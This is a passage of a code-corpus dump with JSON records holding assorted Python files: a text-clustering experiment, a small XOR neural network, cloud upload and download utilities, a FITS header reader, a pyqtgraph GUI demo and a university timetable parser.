validation_data=val_gen, nb_val_samples=2560, samples_per_epoch=23040, nb_epoch=20, verbose=2, callbacks=[checkpoint])\r\n\r\n\r\nmodel.save('model.h5')\r\n\r\nexit()\r\n","sub_path":"Udacity/1st Term/Behavioral Cloning 
Project/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347631334","text":"import numpy as np\nimport csv\nimport os\nfrom sklearn.cluster import KMeans\nfrom utils import load_infersent, load_csv_corpus, infersent_encode_sents, dump_feat\nimport torch\nfrom config import cfg\nfrom sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics import adjusted_mutual_info_score\n\n\ndef cluster_acc(y_true, y_pred):\n \"\"\"\n Calculate clustering accuracy. Require scikit-learn installed\n\n # Arguments\n y: true labels, numpy.array with shape `(n_samples,)`\n y_pred: predicted labels, numpy.array with shape `(n_samples,)`\n\n # Return\n accuracy, in [0,1]\n \"\"\"\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n\ndef get_feat(infersent, data_path, verbose=True, layer_norm=False, split_sents=True):\n if verbose:\n print('Loading Text Data from {}'.format(data_path))\n train_data, train_labels, ids = load_csv_corpus(data_path)\n if verbose:\n print('Building Vocabulary Table for Infersent by {}'.format(data_path))\n infersent.build_vocab(train_data, tokenize=False)\n if verbose:\n print('Extracting Feat using Infersent')\n train_feat = infersent_encode_sents(infersent, train_data, split_sents=split_sents, layer_norm=layer_norm, verbose=False)\n return train_feat, np.array(train_labels), ids\n\n\ndef cluster_alg(feat, n_clusters, n_jobs=3):\n kmeans = KMeans(n_clusters=n_clusters, n_init=10, n_jobs=n_jobs, verbose=True)\n pred = kmeans.fit_predict(feat)\n return pred\n\ndef ln(feat):\n return (feat - feat.mean(axis=1, keepdims=True)) / feat.std(axis=1, keepdims=True)\n\ndef norm(feat):\n return feat / np.linalg.norm(feat, axis=1, keepdims=True)\n\ndef dump_mongo(corpora, feat_name, n_topics, acc, pred, all_pred, all_acc, all_nmi, all_ari):\n from pymongo import MongoClient\n client = MongoClient('59.72.109.90', 27017)\n cluster_db = client.cluster_db\n results = cluster_db.ub_results\n acc_std = np.std(all_acc)\n acc_mean = np.mean(all_acc)\n nmi_std = np.std(all_nmi)\n nmi_mean = np.mean(all_nmi)\n ari_std = np.std(all_ari)\n ari_mean = np.mean(all_ari)\n best_nmi = np.max(all_nmi)\n best_ari = np.max(all_ari)\n tmp = {\n 'corpora': corpora,\n 'feat_name': feat_name,\n 'n_topics': n_topics,\n 'best_pred': pred,\n 'best_acc': acc,\n 'best_nmi':best_nmi,\n 'best_ari':best_ari,\n 'all_pred': all_pred,\n 'all_acc': all_acc,\n 'acc_std':acc_std,\n 'acc_mean':acc_mean,\n 'all_nmi':all_nmi,\n 'nmi_std':nmi_std,\n 'nmi_mean':nmi_mean,\n 'all_ari':all_ari,\n 'ari_std':ari_std,\n 'ari_mean':ari_mean}\n results.insert_one(tmp)\n client.close()\n\nfeat_func_dict = {'ln': ln, 'n': norm, 'i': lambda x: x}\ndata_dict = {0:'ag_news',1:'dbpedia', 2:'yahoo_answers'}\nn_cluster_dict = {0: 4, 1: 14, 2: 10}\n\nif __name__ == '__main__':\n def get_args():\n import argparse\n parser = argparse.ArgumentParser(description='ElMo')\n parser.add_argument('--corpora_id', type=int, default=0, help='corpora id')\n parser.add_argument('--batch_size', 
type=int, default=16, help='batch_size')\n args = parser.parse_args()\n return args\n args = get_args()\n assert 0 <= args.corpora_id <= 2\n corpora_name = data_dict[args.corpora_id]\n n_clusters = n_cluster_dict[args.corpora_id]\n train_path = os.path.join('data', corpora_name, 'ub_train.csv')\n #\n print('Loading Pretrained Infersent Model')\n infersent = load_infersent(cfg.INFERSENT_PATH, return_adaptor=True, use_cuda=torch.cuda.is_available())\n infersent.set_glove_path(cfg.GLOVE_PATH)\n #\n \n train_feat, train_labels, train_ids = get_feat(infersent, train_path, verbose=True)\n\n #\n trial_num = 10\n #\n\n feat = train_feat\n labels = train_labels\n feat_name='Infersent'\n for func_name, feat_trans_func in feat_func_dict.items():\n best_acc = 0.0\n best_pred = None\n feat_tmp = feat_trans_func(feat)\n all_pred = []\n all_acc = []\n all_nmi = []\n all_ari = []\n for i in range(trial_num):\n pred = cluster_alg(feat_tmp, n_clusters)\n acc = cluster_acc(labels, pred)\n nmi = normalized_mutual_info_score(labels, pred)\n ari = adjusted_mutual_info_score(labels, pred)\n all_pred.append(pred.tolist())\n all_acc.append(acc)\n all_nmi.append(nmi)\n all_ari.append(ari)\n if acc > best_acc:\n best_pred = pred\n best_acc = acc\n tmp_feat_name = feat_name + '_{}'.format(func_name)\n print('{} {} best acc is {}'.format(tmp_feat_name, func_name, best_acc))\n pred_std = np.std(all_acc)\n pred_mean = np.mean(all_acc)\n dump_mongo(corpora=corpora_name, \n feat_name=tmp_feat_name, \n n_topics=n_clusters, \n acc=best_acc, \n pred=best_pred.tolist(), \n all_pred=all_pred, \n all_acc=all_acc, \n all_nmi=all_nmi, \n all_ari=all_ari)\n","sub_path":"ub_kmeans_infersent.py","file_name":"ub_kmeans_infersent.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"272226455","text":"'''\r\n* Full NeuralNetwork.py program\r\n\r\n* Author: Mick Perring\r\n* Date: October 2018\r\n\r\n* Adapted from code by Michael A. Nielsen in his online book:\r\n* Neural Networks and Deep Learning\r\n* M. Nielsen, Neural Networks and Deep Learning. Determination Press, 2015\r\n* http://neuralnetworksanddeeplearning.com/\r\n\r\n* This program creates a basic two-layer neural network that performs\r\n* a simple three-input XOR function. 
Datasets must be in .csv format\r\n* and consist of three columns of binary values and a forth column that\r\n* is the XOR of the three values in the three input columns\r\n'''\r\n\r\nimport numpy as np\r\n\r\n# sigmoid activation function\r\ndef sigmoid(x):\r\n\treturn 1.0/(1 + np.exp(-x))\r\n\r\n# derivative of the sigmoid activation function\r\ndef sigmoid_prime(x):\r\n\treturn sigmoid(x)*(1 - sigmoid(x))\r\n\r\n# creates an identity vector of the desired output\r\ndef vector(j):\r\n\te = np.zeros((2, 1))\r\n\te[j] = 1.0\r\n\treturn e\r\n\r\n# loads input dataset and test dataset, and reshapes them\r\ndef data_loader(d_file, t_file=None):\r\n\r\n\tdataset = np.loadtxt(d_file, dtype=int, delimiter=\";\")\r\n\tx = dataset[:,0:3]\r\n\ty = dataset[:,3]\r\n\r\n\ttd = (x, y)\r\n\tin_data = [np.reshape(i, (3, 1)) for i in td[0]]\r\n\tout_data = [vector(j) for j in td[1]]\r\n\r\n\tdata = zip(in_data, out_data)\r\n\r\n\tif t_file:\t\r\n\t\ttestset = np.loadtxt(t_file, dtype=int, delimiter=\";\")\r\n\t\tf = testset[:,0:3]\r\n\t\tg = testset[:,3]\r\n\r\n\t\tts = (f, g)\r\n\t\tin_test = [np.reshape(i, (3, 1)) for i in ts[0]]\r\n\r\n\t\ttest = zip(in_test, ts[1])\r\n\r\n\t\treturn(data, test)\r\n\r\n\telse: return(data)\r\n\r\n'''\r\n* This is the main class of the program. It creates a NeuralNet object instance when\r\n* called and initialises the NN’s weights and biases arrays in the __init__ block.\r\n* It has a number of methods within the class pertaining to the training of the NN\r\n'''\r\nclass NeuralNet(object):\r\n\r\n\tdef __init__(self, i, l, o):\r\n\r\n\t\tself.sizes = [i, l, o]\r\n\t\tself.layers = len(self.sizes)\r\n\t\tself.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\r\n\t\tself.weights = [np.random.randn(y, x) for x, y in zip(self.sizes[:-1], self.sizes[1:])]\r\n\r\n\t'''\r\n\t* Performs the feedforward algorithm during testing and prediction in the NeuralNet.\r\n\t* Returns the activation value a.\r\n\t'''\r\n\tdef forwardprop(self, a):\r\n\r\n\t\tfor b, w in zip(self.biases, self.weights):\r\n\t\t\ta = sigmoid(np.dot(w, a) + b)\r\n\r\n\t\treturn a\r\n\r\n\t'''\r\n\t* This method runs most of the program. It trains the network on the input data using\r\n\t* Stochastic Gradient Descent (SGD). 
It will print out progress to the console, and\r\n\t* if test data is provided, then it will also print out performance metrics for each\r\n\t* training epoch.\r\n\t'''\r\n\tdef train(self, data, epochs, batch, rate, tst=None):\r\n\t\t\r\n\t\tn = len(data)\r\n\r\n\t\tif tst:\r\n\t\t\tn2 = len(tst)\r\n\r\n\t\tfor i in range(epochs):\r\n\t\t\tbatches = [data[j:j+batch] for j in range(0, n, batch)]\r\n\r\n\t\t\tfor x in batches:\r\n\t\t\t\tb_prime = [np.zeros(b.shape) for b in self.biases]\r\n\t\t\t\tw_prime = [np.zeros(w.shape) for w in self.weights]\r\n\r\n\t\t\t\tfor u, v in x:\r\n\t\t\t\t\tdb_p, dw_p = self.backprop(u, v)\r\n\r\n\t\t\t\t\tb_prime = [db+bx for db, bx in zip(b_prime, db_p)]\r\n\t\t\t\t\tw_prime = [dw+wx for dw, wx in zip(w_prime, dw_p)]\r\n\r\n\t\t\t\tself.weights = [w-(rate/len(x))*dw for w, dw in zip(self.weights, w_prime)]\r\n\t\t\t\tself.biases = [b-(rate/len(x))*db for b, db in zip(self.biases, b_prime)]\r\n\r\n\t\t\t\tcorrect = self.eval(tst)\r\n\r\n\t\t\tif tst:\r\n\t\t\t\tprint(\"Epoch{:4d}:{:5d}/{} correct | Accuracy: {:5.2f}%\".format(i+1, correct, n2, (correct/n2)*100.0))\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Epoch {0}/{1} complete\".format(i+1, epochs))\r\n\r\n\t'''\r\n\t* Performs all the backpropagation operations on the NeuralNet during training.\r\n\t* Returns the derivative matrices for the biases and weights, which represent\r\n\t* the gradient for the cost function.\r\n\t'''\r\n\tdef backprop(self, x, y):\r\n\t\t\r\n\t\tb_prime = [np.zeros(b.shape) for b in self.biases]\r\n\t\tw_prime = [np.zeros(w.shape) for w in self.weights]\r\n\t\t\r\n\t\ta = x\r\n\t\tactivations = [x] # list to store all the activations, layer by layer\r\n\t\tz_vectors = [] # list to store all the z vectors, layer by layer\r\n\r\n\t\tfor b, w in zip(self.biases, self.weights):\r\n\t\t\tz = np.dot(w, a)+b\r\n\t\t\tz_vectors.append(z)\r\n\t\t\ta = sigmoid(z)\r\n\t\t\tactivations.append(a)\r\n\r\n\t\t# backward pass\r\n\t\tdelta = self.cost(activations[-1], y) * sigmoid_prime(z_vectors[-1])\r\n\t\tb_prime[-1] = delta\r\n\t\tw_prime[-1] = np.dot(delta, activations[-2].T)\r\n\r\n\t\tfor l in range(2, self.layers):\r\n\t\t\tz = z_vectors[-l]\r\n\t\t\tsp = sigmoid_prime(z)\r\n\t\t\tdelta = np.dot(self.weights[-l+1].T, delta) * sp\r\n\t\t\tb_prime[-l] = delta\r\n\t\t\tw_prime[-l] = np.dot(delta, activations[-l-1].T)\r\n\t\treturn (b_prime, w_prime)\r\n\r\n\t# Returns to partial derivative vector of the cost function and the activation a.\r\n\tdef cost(self, x, y):\r\n\t\treturn(x-y)\r\n\r\n\t# This method evaluates the network performance by returning the number of test\r\n\t# inputs that were correctly predicted in testing.\r\n\tdef eval(self, tst):\r\n\t\tresults = [(np.argmax(self.forwardprop(x)), y) for (x, y) in tst]\r\n\r\n\t\treturn sum(int(x == y) for (x, y) in results)\r\n\r\n# called when the program is run\r\nif __name__ == \"__main__\":\r\n\r\n\t# User input\r\n\ttrn_data = input(\"\\nEnter the training data filename: \")\r\n\ttst_data = input(\"Enter the test data filename (if none, just press enter): \")\r\n\tepochs = int(input(\"Enter the number of training epochs: \"))\r\n\tbatch_size = int(input(\"Enter the batch size: \"))\r\n\tlearn_rate = float(input(\"Enter the learning rate (between 1.0 - 3.0): \"))\r\n\r\n\tif tst_data:\r\n\t\tdata, test = data_loader(trn_data, t_file=tst_data)\r\n\t\ttest = list(test)\r\n\telse:\r\n\t\tdata = data_loader(trn_data, t_file=None)\r\n\r\n\tdata = list(data)\r\n\r\n\tnet = NeuralNet(3, 4, 2)\r\n\r\n\tprint()\r\n\r\n\tif 
tst_data:\r\n\t\tnet.train(data, epochs, batch_size, learn_rate, tst=test)\r\n\telse: \r\n\t\tnet.train(data, epochs, batch_size, learn_rate, tst=None)\r\n","sub_path":"Neural_Net/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175031915","text":"import subprocess\nfrom os.path import join\nfrom subprocess import call\n\nimport boto3\n\nfrom faasmcli.util.env import AWS_REGION\n\n_s3 = None\n\n\ndef _get_s3():\n global _s3\n if _s3 is None:\n _s3 = boto3.resource(\"s3\", region_name=AWS_REGION)\n\n return _s3\n\n\ndef upload_file_to_s3(file_path, s3_bucket, s3_key, public=False):\n s3 = _get_s3()\n kwargs = {\"ExtraArgs\": {\"ACL\": \"public-read\"}} if public else {}\n s3.Bucket(s3_bucket).upload_file(file_path, s3_key, **kwargs)\n\n\ndef upload_file_to_ibm(file_path, bucket_name, key):\n cmd = [\n \"ibmcloud\", \"cos\", \"put-object\",\n \"--bucket\", bucket_name,\n \"--key\", key,\n \"--body\", file_path,\n ]\n\n call(\" \".join(cmd), shell=True)\n\n\ndef list_files_s3(s3_bucket, prefix):\n s3 = _get_s3()\n b = s3.Bucket(s3_bucket)\n\n key_strings = []\n for k in b.objects.filter(Prefix=prefix):\n key_strings.append(k.key)\n\n return key_strings\n\n\ndef download_file_from_s3(s3_bucket, s3_key, file_path, boto=True):\n if boto:\n print(\"Downloading file using boto - {}\".format(file_path))\n s3 = _get_s3()\n s3.Bucket(s3_bucket).download_file(s3_key, file_path)\n else:\n url = \"https://s3-{}.amazonaws.com/{}/{}\".format(AWS_REGION, s3_bucket, s3_key)\n cmd = \"wget -q {} -O {}\".format(url, file_path)\n print(cmd)\n subprocess.check_output(cmd, shell=True)\n\n\ndef download_tar_from_s3(s3_bucket, tar_name, tar_dir, boto=True):\n tar_path = join(tar_dir, tar_name)\n download_file_from_s3(s3_bucket, tar_name, tar_path, boto=boto)\n\n print(\"Extracting file {} (at {})\".format(tar_name, tar_dir))\n subprocess.check_output(\"tar --no-same-owner -xf {}\".format(tar_name), shell=True, cwd=tar_dir)\n\n\ndef download_tar_from_url(url, tar_name, tar_dir):\n tar_path = join(tar_dir, tar_name)\n\n cmd = \"wget -q {} -O {}\".format(url, tar_path)\n print(cmd)\n subprocess.check_output(cmd, shell=True)\n\n print(\"Extracting file {} (at {})\".format(tar_name, tar_dir))\n subprocess.check_output(\"tar --no-same-owner -xf {}\".format(tar_name), shell=True, cwd=tar_dir)\n\n\ndef copy_object_in_s3(s3_bucket, src_key, dest_key, public=False):\n s3 = _get_s3()\n kwargs = {\"ACL\": \"public-read\"} if public else {}\n s3.Object(s3_bucket, dest_key).copy_from(\n CopySource=\"{}/{}\".format(s3_bucket, src_key),\n **kwargs\n )\n\n\ndef curl_file(url, file_path, headers=None):\n cmd = [\n \"curl\",\n \"-X\", \"PUT\",\n url,\n \"-T\", file_path\n ]\n\n headers = headers if headers else {}\n for key, value in headers.items():\n cmd.append(\"-H \\\"{}: {}\\\"\".format(key, value))\n\n cmd = \" \".join(cmd)\n print(cmd)\n res = subprocess.call(cmd, shell=True)\n\n if res == 0:\n print(\"Successfully PUT file {} to {}\".format(file_path, url))\n else:\n raise RuntimeError(\"Failed PUTting file {} to {}\".format(file_path, url))\n","sub_path":"faasmcli/faasmcli/util/upload_util.py","file_name":"upload_util.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435032878","text":"#!/usr/bin/env/ python\n\"\"\"\nvoid_reducer 0.1\n\nPrints header data from a FITS filenames from 
stdin.\n\nUsage:\n void_reducer [--verbosity=V]\n void_reducer -v | --version\n void_reducer -h | --help\n\nOptions:\n -h --help Show this help screen\n -v --version Show program name and version number\n -V --verbosity=V Logging verbosity, 0 to 4 [default: 2]\n\"\"\"\n\nimport json\nimport logging\nimport sys\n\nimport docopt\nfrom astropy.io import fits\n\nfrom void import common, config\n\nlog = logging.getLogger(__name__)\n\n\ndef print_header_data(fits_fname):\n \"\"\"\n Prints header data from a certain FITS file as a JSON dictionary.\n \"\"\"\n log.debug('printing data for %s', fits_fname)\n\n with fits.open(fits_fname) as hdul:\n header_dict = hdul[0].header\n\n date_obs = header_dict['DATE-OBS']\n exp = header_dict['EXPTIME']\n focus = header_dict['FOCUSPOS']\n ra_center = header_dict['OBJCTRA']\n dec_center = header_dict['OBJCTDEC']\n\n x_pix_size = header_dict['NAXIS1']\n y_pix_size = header_dict['NAXIS2']\n x_binning = header_dict['XBINNING']\n y_binning = header_dict['YBINNING']\n\n x_scale = config.SCALE_X_BIN1\n y_scale = config.SCALE_Y_BIN1\n\n x_deg_size = float(x_pix_size * x_binning * x_scale) / 3600\n y_deg_size = float(y_pix_size * y_binning * y_scale) / 3600\n\n return_dict = {\n 'date_obs': date_obs,\n 'exposition': exp,\n 'focus': focus,\n 'ra_center': ra_center,\n 'dec_center': dec_center,\n 'x_deg_size': x_deg_size,\n 'y_deg_size': y_deg_size,\n }\n\n json_dict = json.dumps(return_dict)\n sys.stdout.write(f'{json_dict}\\n')\n\n\ndef main():\n name_and_version = __doc__.strip().splitlines()[0]\n arguments = docopt.docopt(__doc__, help=True, version=name_and_version)\n common.configure_log(arguments['--verbosity'])\n log.debug('initialising')\n\n fnames_arr = []\n\n for line in sys.stdin:\n fnames_arr.append(line.strip())\n\n for fname in fnames_arr:\n print_header_data(fname)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"void/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213936135","text":"# Nicholas Anway\n# Reference http://strftime.org/ for the format string codes\n\nfrom datetime import datetime\n\nraw_date = \"2017-01-11\"\ndate_format = \"%Y-%m-%d\"\n\n# take the string object type and read into python datetime format\nparsed_date = datetime.strptime(raw_date, date_format)\n\n# or...\nparsed_date = datetime.strptime(raw_date, \"%Y-%m-%d\")\n\n# convert parsed date to a string in a given format\ndate_str = parsed_date.strftime(\"%m/%d/%y\")\n\nprint(raw_date)\nprint(parsed_date)\nprint(date_str)\n","sub_path":"datetime-example.py","file_name":"datetime-example.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385169590","text":"import sys\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nimport random\n\nclass TestClass(QtGui.QMainWindow):\n #####################################################\n def __init__(self):\n super(TestClass, self).__init__()\n self.initUI()\n ####################################################\n # GUI construction\n def initUI(self):\n self.setWindowTitle(\"Mouse Point, x & y\")\n win = QtGui.QWidget()\n # creates plot\n self.plot = pg.PlotWidget()\n self.plot.setLabel('left', \"B\", units='T')\n self.plot.setLabel('bottom', \"t\", units='s')\n self.plot.showGrid(x=1, y=1, alpha=None)\n self.setCentralWidget(win)\n self.setGeometry(600, 600, 600, 600)\n 
self.setWindowTitle('Mouse Point, x & y GUI')\n\n        # Create some widgets to be placed inside\n        btnRandom = QtGui.QPushButton('Random Function')\n        # Create a grid layout to manage the widgets size and position\n        layout = QtGui.QGridLayout(win)\n\n        # Add widgets to the layout in their proper positions\n        layout.addWidget(btnRandom, 0, 0)  # button that regenerates the curve with random data\n        layout.addWidget(self.plot, 1, 0)\n\n        mypen = pg.mkPen('y', width=1)\n        self.curve = self.plot.plot(x=[], y=[], pen=mypen)\n\n        # Plot\n        self.t_plot_max = 30\n        self.fe = 10e3\n        self.t = np.arange(-1 * self.t_plot_max, 0, 1.0 / self.fe)\n        self.len_signal = len(self.t)\n        self.signal = np.zeros(self.len_signal, dtype=np.double)\n\n        btnRandom.clicked.connect(self.buttonRandomClicked)\n        self.curve.scene().sigMouseMoved.connect(self.onMouseMoved)\n\n    def onMouseMoved(self, point):\n        p = self.plot.plotItem.vb.mapSceneToView(point)\n        self.statusBar().showMessage(\"{}-{}\".format(p.x(), p.y()))\n\n    def buttonRandomClicked(self):\n        print(\"Regenerating random data\")\n        self.signal = np.random.rand(20)\n        self.curve.setData(self.signal)\n\n\n# MAIN ##################################################\ndef main():\n    app = QtGui.QApplication(sys.argv)\n    ex = TestClass()\n    ex.show()\n    sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"PyQt/Useful/PyqtgraphCoordinate.py","file_name":"PyqtgraphCoordinate.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"383229727","text":"from bs4 import BeautifulSoup#Beautifulsoup is an HTML parser that will make parsing the schedule easier\nfrom Course import Course\nfrom CourseSegment import CourseSegment\nfrom TimeBlock import TimeBlock\n\nclass MacCourseLoader():\n\thtml_file_name=\"Timetable.htm\" #redundant, UniSchedule.py assigns same value\n\toutput_file_name=\"stripped.txt\" #redundant, UniSchedule.py assigns same value\n\tstripped_file=None\n\tcurrent_dept=None\n\tpeeked_line=False\n\tline_no=0\n\n\tdef preload(self):\n\t\t#Try to open file\n\t\t#if it does not exist yet\n\t\t#make it, prep to read\n\t\ttry:\n\t\t\tself.stripped_file=open(self.output_file_name, 'r')\n\t\texcept IOError:\n\t\t\tself.make_text(self.html_file_name,self.output_file_name)\n\t\t\tself.stripped_file=open(self.output_file_name, 'r')\n\n\t\tfor i in range(0,2):#skip the header lines before the first department\n\t\t\tself.read_line()\n\n\n\tdef make_text(self,html_file_name,output_file_name):\n\t\t#Open HTML\n\t\t#Scrape it with beautiful soup\n\t\t#write out to a file\n\t\tself.html_file_name=html_file_name\n\t\tself.output_file_name=output_file_name\n\n\t\twith open(self.html_file_name, \"r\") as myfile:\n\t\t\thtml_doc=myfile.read()\n\t\t\tsoup = BeautifulSoup(html_doc)\n\t\t\tstripped=soup.get_text().encode(\"ascii\",'ignore')#changing encoding may be needed on other platforms.\n\t\t\tfo = open(self.output_file_name, \"wb\")\n\t\t\tfo.write(stripped)\n\t\t\t# Close opened file\n\t\t\tfo.close()\n\n\t\tself.stripped_file=open(output_file_name, 'r')\n\n\tdef pop_course(self):#Reads one course from file\n\t\t#returns None if course isn't scheduled for this year\n\t\t#Otherwise gives course\n\n\t\tline=self.read_line()\n\n\t\t#Occasionally instead of a course's information a line will have a new\n\t\t#department, if this is the case set the department to the current line\n\t\t#and then read in another line which should be a course code\n\t\tif 
self.is_dept(line):\n\t\t\tself.current_dept=line\n\t\t\tline=self.read_line()\n\n\t\tcourse_code=line\n\n\t\t#There are really weird edge cases where this line isn't a course code\n\t\t#This reads until a course code, solving those errors\n\t\twhile not self.is_course_code(course_code):\n\t\t\tcourse_code=self.read_line()\n\t\tassert self.is_course_code(course_code)\n\n\t\tcourse_name=self.read_line()\n\n\t\tline=self.read_line()\n\t\tif line == \"NOT OFFERED\":#This exact string is used to indicate not offered courses\n\t\t\treturn None\n\t\tcourse_term=int(line[-1])#Get the last character of the line, \"T1\" -> 1\n\n\t\tcourse_section=self.read_line()#DAY or EVE are the exact strings\n\t\tassert self.is_section(course_section)\n\n\t\t#All of the course's information has been loaded so the course is created\n\t\tnew_course=Course(self.current_dept,course_code,course_name,course_term,course_section)\n\n\t\t#If information about what site the course is for is given, it is skipped over\n\t\tif \"SITE STUDENTS\" in self.peek_line():\n\t\t\tself.read_line()\n\n\t\t#If the course is cancelled read ahead until the next line is a course or a department\n\t\tif \"CANCELLED\" in self.peek_line():\n\t\t\tself.read_until([self.is_course_code,self.is_dept])\n\t\t\treturn None\n\n\t\t#Read in all of the courses segments\n\t\twhile (self.is_class_type(self.peek_line()) or self.is_ignorable(self.peek_line())):\n\t\t\tnew_course_segment=self.read_course_segment()\n\t\t\tif new_course_segment:\n\t\t\t\tnew_course.add(new_course_segment)\n\t\t\tif self.is_ignorable(self.peek_line()):\n\t\t\t\tself.read_line()\n\t\t#new_course.consolidate_segments()\n\t\treturn new_course\n\n\n\tdef read_course_segment(self):\n\t\t#Reads one course segment\n\t\t#Ensures the course is running\n\t\t#Gets the note if any\n\t\tnew_segment=CourseSegment()\n\t\tline=self.read_line()\n\n\n\t\tif \"EOW\" in line:\n\t\t\tnew_segment.eow=True\n\t\t\tline=self.read_line()\n\n\t\t#If the course segment is cancelled, read until the next line is the\n\t\t#start of a new segment or a new course or a new department\n\t\tif \"CANCELLED\" in line:\n\t\t\tself.read_until([self.is_course_code,self.is_class_type,self.is_dept])\n\n\t\tassert self.is_class_type(line)\n\t\tnew_segment.name=line\n\n\t\t#If there aren't details about the segment, it won't be loaded\n\t\t#Read until the next segment or course is read.\n\t\tif \"TBA\" in self.peek_line() or \"CANCELLED\" in self.peek_line():\n\t\t\tself.read_until([self.is_course_code,self.is_class_type,self.is_dept])\n\t\t\treturn None\n\n\t\twhile self.is_days(self.peek_line()):\n\t\t\tline=self.read_line()\n\t\t\tassert self.is_days(line)\n\t\t\tdays=line.split()\n\n\t\t\tstart_hour,start_min=self.read_time()\n\t\t\tend_hour,end_min=self.read_time()\n\t\t\tterm=int(self.read_line())\n\n\t\t\tfor day in days:\n\t\t\t\tblock=TimeBlock(TimeBlock.day_to_num[day],start_hour,start_min,end_hour,end_min,term)\n\t\t\t\tnew_segment.add(block)\n\n\t\t\tline=self.peek_line()\n\t\t\tif self.is_room(line):\n\t\t\t\tnew_segment.room=self.read_line()\n\t\t\t\tline=self.peek_line()\n\t\t\tif self.is_prof(line):\n\t\t\t\tnew_segment.prof=self.read_line()\n\t\t\t\tline=self.peek_line()\n\t\t\tif self.is_note(line):\n\t\t\t\tnew_segment.note=self.read_line()\n\t\treturn new_segment\n\n\tdef read_until(self,functions):\n\t\tstill_reading = True\n\t\tfor check in functions:\n\t\t\tif check(self.peek_line()):\n\t\t\t\tstill_reading = False\n\t\twhile still_reading:\n\t\t\tself.read_line()\n\t\t\tfor check in 
functions:\n\t\t\t\tif check(self.peek_line()):\n\t\t\t\t\tstill_reading = False\n\n\tdef read_time(self):\n\t\tline=self.read_line()\n\t\tassert self.is_time(line)\n\t\thour,min=line.split(\":\")\n\t\thour=int(hour)\n\t\tmin=int(min)\n\t\treturn hour,min\n\n\tdef is_ignorable(self,line):\n\t\tignorable_words = [\"EOW\",\"CANCELLED\",\"SITE\"]\n\t\tfor word in ignorable_words:\n\t\t\tif word in line:\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef is_note(self,text):\n\t\t#list other methods\n\t\t#iterate and try them all\n\t\t#woo hoo go python\n\t\tother_checks=[\n\t\t\tself.is_course_code,\n\t\t\tself.is_class_type,\n\t\t\tself.is_section,\n\t\t\tself.is_days,\n\t\t\tself.is_dept,]\n\t\tfor check in other_checks:\n\t\t\tif check(text):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef is_course_code(self,text):\n\t\tif len(text)!=4:\n\t\t\treturn False\n\t\treturn (not text[0].isalpha())and(text[1].isalpha())and(not text[3].isalpha())\n\n\tdef is_class_type(self,text):\n\t\tif not len(text)==3:\n\t\t\treturn False\n\t\treturn ((text[0].isalpha())and(not text[1].isalpha())and(not text[2].isalpha()))\n\n\tdef is_room(self,text):\n\t\tif \"MHK/CAMPUS\" in text or \"CON/CAMPUS\" in text:\n\t\t\treturn True\n\t\treturn (\"/\" in text) and len(text)<10\n\n\tdef is_prof(self,text):\n\n\t\treturn (\",\" in text) and (text.count(\" \")<=5)\n\n\tdef is_time(self,text):\n\t\tif len(text)!=5 or text[2] != \":\":\n\t\t\treturn False\n\t\treturn text.replace(\":\",\"\").isnumeric()\n\n\tdef is_section(self,text):\n\n\t\treturn text == \"DAY\" or text == \"EVE\"\n\n\tdef is_days(self,text):\n\t\twords=text.split()\n\t\tfor word in words:\n\t\t\tif not word in TimeBlock.day_to_num:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef is_dept(self,text):\n\n\t\treturn \"(\" in text and \")\" in text\n\n\tdef peek_line(self):#Reads the next line in the file but stores it as peeked_line\n\t\tself.peeked_line=self.read_line()\n\t\treturn self.peeked_line\n\n\tdef read_line(self):#returns the next non blank line in the file, unless a line was peeked, then it returns the peeked line.\n\t\tif self.peeked_line:\n\t\t\tline=self.peeked_line\n\t\t\tself.peeked_line=False\n\t\telse:\n\t\t\tline=self.stripped_file.readline()\n\t\t\tself.line_no += 1\n\t\t\tif line == \"\":\n\t\t\t\t#An empty string indicates EOF\n\t\t\t\traise EOFError()\n\t\t\tline=str(line).strip()#Strip whitespace from the read line\n\n\t\t\twhile line == \"\":\n\t\t\t\t#If the line was just whitespace\n\t\t\t\tself.line_no+=1\n\t\t\t\tline=self.stripped_file.readline()\n\t\t\t\tif line == \"\":#An empty string indicates EOF\n\t\t\t\t\traise EOFError()\n\n\t\t\t\tline=str(line).strip()#Strip whitespace and newlines\n\t\treturn line\n","sub_path":"server/MacCourseLoader.py","file_name":"MacCourseLoader.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"138613546","text":"'''\nFind a surface fulfilling a certain criterion in a snapshot\nSam 